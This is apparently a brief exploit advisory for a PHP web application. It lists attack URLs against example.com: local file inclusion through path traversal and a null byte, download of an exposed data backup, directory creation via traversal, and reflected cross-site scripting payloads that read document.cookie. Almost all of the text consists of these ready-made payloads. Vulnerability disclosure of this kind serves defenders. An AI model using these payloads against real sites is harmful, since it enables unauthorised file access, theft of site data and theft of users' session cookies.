Local File Inclusion Note : magic_quotes_gpc must be off. http://www.example.com/index.php?page=weblog&env=../../../autoexec.bat%00 Download Backup http://www.example.com/backup/cmme_data.zip Make Directory http://www.example.com/admin.php?action=login&page=home&script=index.php&env=../!!!Owned!!! Cross Site Scripting http://www.example.com/statistics.php?action=hstat_year&page=<script>alert(document.cookie)</script>&env=data http://www.example.com/statistics.php?action=hstat_year&year=<script>alert(document.cookie)</script>&env=data